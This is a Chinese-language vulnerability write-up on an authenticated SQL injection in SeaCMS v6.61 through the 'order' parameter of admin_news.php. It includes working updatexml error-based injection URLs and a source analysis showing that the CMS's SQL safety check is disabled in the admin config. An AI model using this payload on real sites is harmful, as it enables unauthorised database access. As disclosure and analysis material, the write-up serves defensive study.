SEACMS最新版(V6.61)后台SQL注入[CNVD-2018-12347]

Veröffentlicht am

后台注入,需要登录

注入点在order by 后面

正常访问时:

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id--#&page=0&type=

倒序时:

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id+desc--#&page=0&type=

使用updatexml进行报错注入

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id+and(updatexml(1,concat(0x7e,(select%20user())),0))--#&page=0&type=

源码分析:

漏洞文件:

\seacmsV6.61\admin\templets\admin_news.htm

admin_news.php 中使用include包含该文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
$numPerPage=20;
if(empty($order)) $order="n_addtime";  //$order的值不为空
$orderStr= " order by d.$order desc"; // d拼接$order
$page = isset($page) ? intval($page) : 1;
if($page==0) $page=1;
$whereStr="  ";
if ($action=="nullpic") $whereStr.=" and d.v_pic=''";
if ($n_recycled=="ok") $whereStr.=" and d.n_recycled=1";
if (!empty($type)) $whereStr.=" and d.tid in (".getTypeId($type).")";
if (!empty($keyword)) $whereStr.=" and d.n_title like '%".$keyword."%'";
$whereorder = str_replace("where order","order",str_replace("where and","and",$whereStr.$orderStr)); //$whereorder 即为"  order by d.$order desc"
$csqlStr="select count(*) as dd from `sea_news` d where d.n_recycled=0 ".$whereorder; //第一处拼接查询语句
if ($n_recycled=="ok")$csqlStr="select count(*) as dd from `sea_news` d where d.n_recycled=1 ".$whereorder;
$row = $dsql->GetOne($csqlStr); 进入GetOne()
if(is_array($row)){
$TotalResult = $row['dd'];
}else{
$TotalResult = 0;
}
$TotalPage = ceil($TotalResult/$numPerPage);
if ($page>$TotalPage) $page=$TotalPage;
$limitstart = ($page-1) * $numPerPage;
if($limitstart<0) $limitstart=0;
$sqlStr="select d.n_id,d.n_title,d.n_hit,0,d.tid,d.n_addtime,d.n_commend,t.tname from sea_news d left join `sea_type` t on t.tid=d.tid where d.n_recycled=0 ".$whereorder." limit $limitstart,$numPerPage"; //第二处拼接查询语句
if ($n_recycled=="ok") $sqlStr="select d.n_id,d.n_title,d.n_hit,0,d.tid,d.n_addtime,d.n_commend,t.tname from sea_news d left join `sea_type` t on t.tid=d.tid  where 1=1 ".$whereorder." limit $limitstart,$numPerPage";
//echo $sqlStr;die();
?>

跟进GetOne()

seacmsV6.61\include\sql.class.php

主要是看Execute()

数据在进入mysql_query()之前会进行SQL语句安全检查,重点在这

这里的$this->safeCheck前面赋值为true,但是我们的payload没有进入SQL语句安全检测,为什么呢

1
2
3
4
5
  if($this->safeCheck)
        {
            
            CheckSql($this->queryString);
        }

admin_news.php 中包含seacmsV6.61\admin\config.php

config.php中的$dsql->safeCheck=false,所以就跳过了CheckSql()这个检查函数,SQL注入因此产生

看到有人用这个洞申请CVE,想想也没什么意思。